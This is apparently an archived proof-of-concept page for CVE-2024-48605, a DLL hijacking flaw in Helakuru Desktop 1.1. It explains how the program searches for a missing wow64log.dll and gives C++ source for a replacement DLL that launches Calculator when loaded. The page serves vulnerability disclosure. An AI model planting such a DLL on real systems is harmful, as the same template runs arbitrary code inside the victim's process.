关联漏洞
描述
Helakuru Version 1.1 DLL Hijack - CVE-2024-48605
介绍
**DLL Hijacking Vulnerability in Helakuru**
---
**Summary**
The Helakuru Desktop version 1.1v operates on both 64-bit and 32-bit architectures. During testing, it was identified that the program attempts to load wow64log.dll, which is not included by default in modern Windows operating systems. This results in a 'Name not found' error, exposing the program to a DLL Hijacking vulnerability. By crafting a malicious wow64log.dll, arbitrary code execution can be achieved.
**Affected Version**
Helakuru Desktop 1.1v
**Steps to Reproduce**
1. Monitor DLL Loading with ProcMon
* ProcMon showing the CreateFile operation with "Name not found" for wow64log.dll

2. Create a Malicious wow64log.dll
``` C++
#include <windows.h>
#include <stdio.h>
void LaunchCalculator()
{
STARTUPINFOA si;
PROCESS_INFORMATION pi;
ZeroMemory(&si, sizeof(si));
si.cb = sizeof(si);
ZeroMemory(&pi, sizeof(pi));
const char* calcCmd = "C:\\Windows\\System32\\calc.exe";
if (!CreateProcessA(
NULL,
(LPSTR)calcCmd,
NULL,
NULL,
FALSE,
0,
NULL,
NULL,
&si,
&pi))
{
printf("CreateProcess failed (%d).\n", GetLastError());
}
else
{
WaitForSingleObject(pi.hProcess, INFINITE);
CloseHandle(pi.hProcess);
CloseHandle(pi.hThread);
}
}
BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved)
{
switch (ul_reason_for_call)
{
case DLL_PROCESS_ATTACH:
LaunchCalculator();
break;
case DLL_THREAD_ATTACH:
case DLL_THREAD_DETACH:
case DLL_PROCESS_DETACH:
break;
}
return TRUE;
}
```
3. Run Helakuru Desktop
* Launch Helakuru Desktop again. The malicious wow64log.dll will now be loaded into the program, triggering the Calculator as a demonstration of successful DLL injection.

4. Verify DLL Load using ProcMon
* Reopen ProcMon and observe that the wow64log.dll is successfully loaded this time, confirming that the custom DLL has been executed by the program.

**Impact**: This vulnerability allows for arbitrary code execution.
文件快照
[4.0K] /data/pocs/290bd1c52981777c7284eb32b1c9a88195c99378
├── [1.0K] LICENSE
└── [2.5K] README.md
0 directories, 2 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。